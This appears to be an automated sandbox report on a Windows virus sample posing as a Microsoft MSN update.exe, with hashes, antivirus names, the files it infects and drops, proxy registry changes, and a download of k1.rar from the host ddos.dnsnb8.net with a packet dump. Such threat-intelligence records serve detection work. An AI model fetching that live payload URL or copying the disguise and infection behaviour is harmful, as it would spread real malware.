Analysis Date: 2016-01-07 13:31:34
MD5: c721b7e2c72d37fd4e422aa14b44e5d9
SHA1: 9aa9382a8aceda7a6fe270f808d05701d33ea601

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: 4541819bd3a94a6e0cb6b8a5e32ce1c6 sha1: e6f3f8576709092ce91015520ebf0c013d2ab1fc size: 61440
Section .data md5: 36eaf6f5bdc13c89f41f0f2dac895890 sha1: 78d827534867d63228565c5edb33763dc72db827 size: 4096
Section .rsrc md5: d7155ad801552d74a91f9302ecaae230 sha1: 6690fe5bf31927b5f2239e17f5e03d7b4880383a size: 8192
Section e;5u md5: 418b5c7723d658184261490ff1552dfb sha1: b7cd75df665783e02a4881b35157b53dd81a0c67 size: 20480
Timestamp: 2001-07-19 19:30:03
Pdb path: db
Version:
LegalCopyright: Copyright (C) Microsoft Corp. 1981-2000
InternalName: update
FileVersion: 6.10.0016.1624
CompanyName: Microsoft Corporation
Built by: msnbld
ProductName: Microsoft(R) MSN (R) Communications System
ProductVersion: 6.10.0016.1624
FileDescription: update
OriginalFilename: update.exe
PEhash: feec475ba12cf4d68908e50d598e6dac5ebd82a6
IMPhash: b51f22a4896575229889a74a6c48f13a
AV CA (E-Trust Ino): Win32/Nimnul.A
AV Rising: Win32.Roue.a
AV Mcafee: W32/Kudj
AV Avira (antivir): W32/Jadtre.B
AV Twister: Virus.558BEC81EC@120000#.mg
AV Ad-Aware: Win32.VJadtre.3
AV Alwil (avast): Malware-gen:Evo-gen [Susp]:Win32:Malware-gen
AV Eset (nod32): Win32/Wapomi.BA virus
AV Grisoft (avg): Win32/Wapomi.I
AV Symantec: W32.Wapomi.C!inf
AV Fortinet: W32/Nimnul.F
AV BitDefender: Win32.VJadtre.3
AV K7: Virus ( 0040f7441 )
AV Microsoft Security Essentials: Virus:Win32/Mikcer.B
AV MicroWorld (escan): Win32.VJadtre.3
AV MalwareBytes: no_virus
AV Authentium: W32/PatchLoad.E
AV Frisk (f-prot): W32/PatchLoad.E
AV Ikarus: Trojan-Downloader.Win32.Small
AV Emsisoft: Win32.VJadtre.3
AV Zillya!: Virus.Nimnul.Win32.5
AV Kaspersky: Virus.Win32.Nimnul.f
AV Trend Micro: PE_WAPOMI.BM
AV CAT (quickheal): W32.Nimnul.F1
AV VirusBlokAda (vba32): Virus.Nimnul.19209
AV BullGuard: Win32.VJadtre.3
AV Arcabit (arcavir): Win32.VJadtre.3
AV ClamAV: Win.Trojan.Downloader-64296
AV Dr. Web: BackDoor.Darkshell.246
AV F-Secure: Win32.VJadtre.3

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\mGYKk.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\mGYKk.exe
Creates Mutex: {BB7E11D6-5E67-4005-A530-ED1831D6A427}

Process
↳ C:\WINDOWS\system32\cmd.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\mGYKk.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\GTplus\Time ➝ NULL
Creates File: C:\temp\files\AcroRd32.exe
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe
Creates File: C:\Program Files\MSN\MSNCoreFiles\Install\msnsusii.exe
Creates File: C:\Program Files\MSN\MSNCoreFiles\Install\MSN9Components\Digcore.exe
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\Updater\acroaum.exe
Creates File: C:\temp\files\malware.exe
Creates File: \Device\Afd\AsyncConnectHlp
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\setup.exe
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32.exe
Creates File: C:\temp\files\monitor.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\22b810e9.bat
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\instmsiw.exe
Creates File: PIPE\lsarpc
Creates File: C:\temp\files\mGYKk.exe
Creates File: \Device\Afd\Endpoint
Creates File: C:\Program Files\MSN\MSNCoreFiles\Install\MSN9Components\Msncli.exe
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32Info.exe
Winsock DNS: ddos.dnsnb8.net
Winsock URL: http://ddos.dnsnb8.net:799/cj//k1.rar

Network Details:

DNS: ddos.dnsnb8.net
Type: A
23.253.76.160
HTTP GET: http://ddos.dnsnb8.net:799/cj//k1.rar
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1032 ➝ 23.253.76.160:799
Flows TCP: 192.168.1.1:1033 ➝ 23.253.76.160:799
Flows TCP: 192.168.1.1:1034 ➝ 23.253.76.160:799
Flows TCP: 192.168.1.1:1035 ➝ 23.253.76.160:799
Flows TCP: 192.168.1.1:1036 ➝ 23.253.76.160:799

Raw Pcap
0x00000000 (00000)   47455420 2f636a2f 2f6b312e 72617220   GET /cj//k1.rar 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000030 (00048)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000040 (00064)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000050 (00080)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000060 (00096)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000070 (00112)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000080 (00128)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000090 (00144)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000a0 (00160)   486f7374 3a206464 6f732e64 6e736e62   Host: ddos.dnsnb
0x000000b0 (00176)   382e6e65 743a3739 390d0a43 6f6e6e65   8.net:799..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....


Strings